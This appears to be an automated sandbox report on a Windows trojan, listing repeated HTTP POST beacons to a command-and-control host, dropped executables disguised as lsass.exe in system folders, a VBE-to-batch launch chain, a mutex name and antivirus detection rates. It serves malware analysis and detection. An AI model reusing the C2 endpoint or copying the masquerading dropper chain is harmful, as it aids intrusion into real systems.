Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1268Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1268Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 319351cm.nyashteam.ru

Source: unknown

HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://319351cm.nyashtX
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://319351cm.nyashteam.ru
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://319351cm.nyashteam.ru/
Source: EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php
Source: Surrogatedll.exe, 00000005.00000002.2202927639.0000000003E33000.00000004.00000800.00020000.00000000.sdmp, EeMFgDHDyZvTl.exe, 0000000B.00000002.4562754351.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_00226FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00226FAA

Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Globalization\Time Zone\lsass.exe	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Globalization\Time Zone\6203df4a6bafc7	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Cursors\EeMFgDHDyZvTl.exe	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File created: C:\Windows\Cursors\3dcb0eb9430f8d	Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022848E	0_2_0022848E
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00236CDC	0_2_00236CDC
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002300B7	0_2_002300B7
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00234088	0_2_00234088
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002240FE	0_2_002240FE
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00237153	0_2_00237153
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002451C9	0_2_002451C9
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002232F7	0_2_002232F7
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002362CA	0_2_002362CA
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002343BF	0_2_002343BF
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022C426	0_2_0022C426
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022F461	0_2_0022F461
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0024D440	0_2_0024D440
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002377EF	0_2_002377EF
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022286B	0_2_0022286B
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0024D8EE	0_2_0024D8EE
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022E9B7	0_2_0022E9B7
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_002519F4	0_2_002519F4
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00233E0B	0_2_00233E0B
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_00244F9A	0_2_00244F9A
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022EFE2	0_2_0022EFE2
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34530D78	5_2_00007FFD34530D78
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD345312CD	5_2_00007FFD345312CD
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34923D7F	5_2_00007FFD34923D7F
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34925A11	5_2_00007FFD34925A11
Source: C:\webCrt\Surrogatedll.exe	Code function: 5_2_00007FFD34927E48	5_2_00007FFD34927E48
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34550D78	11_2_00007FFD34550D78
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD345512CD	11_2_00007FFD345512CD
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34611C94	11_2_00007FFD34611C94
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34613B54	11_2_00007FFD34613B54
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34612F8C	11_2_00007FFD34612F8C
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34613454	11_2_00007FFD34613454
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34611C20	11_2_00007FFD34611C20
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD3494E534	11_2_00007FFD3494E534
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34940B39	11_2_00007FFD34940B39
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34948F55	11_2_00007FFD34948F55
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Code function: 11_2_00007FFD34945A10	11_2_00007FFD34945A10

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\DWhAaqcM.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: String function: 0023EB78 appears 39 times
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: String function: 0023EC50 appears 56 times
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: String function: 0023F5F0 appears 31 times

Source: kqq1aAcVUQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Surrogatedll.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EeMFgDHDyZvTl.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lsass.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EeMFgDHDyZvTl.exe0.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EeMFgDHDyZvTl.exe1.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EeMFgDHDyZvTl.exe2.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@18/26@1/2

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_00226C74 GetLastError,FormatMessageW,

0_2_00226C74

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0023A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0023A6C2

Source: C:\webCrt\Surrogatedll.exe

File created: C:\Users\user\Desktop\KCOiojdz.log

Jump to behavior

Source: C:\Recovery\EeMFgDHDyZvTl.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_03
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-v4jM5EqcBKIc3KhugfDk

Source: C:\webCrt\Surrogatedll.exe

File created: C:\Users\user\AppData\Local\Temp\MilWjNMpDI

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" "

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Command line argument: sfxname	0_2_0023DF1E
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Command line argument: sfxstime	0_2_0023DF1E
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Command line argument: STARTDLG	0_2_0023DF1E
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Command line argument: xz'	0_2_0023DF1E

Source: kqq1aAcVUQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kqq1aAcVUQ.exe	ReversingLabs: Detection: 79%
Source: kqq1aAcVUQ.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

File read: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kqq1aAcVUQ.exe "C:\Users\user\Desktop\kqq1aAcVUQ.exe"
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
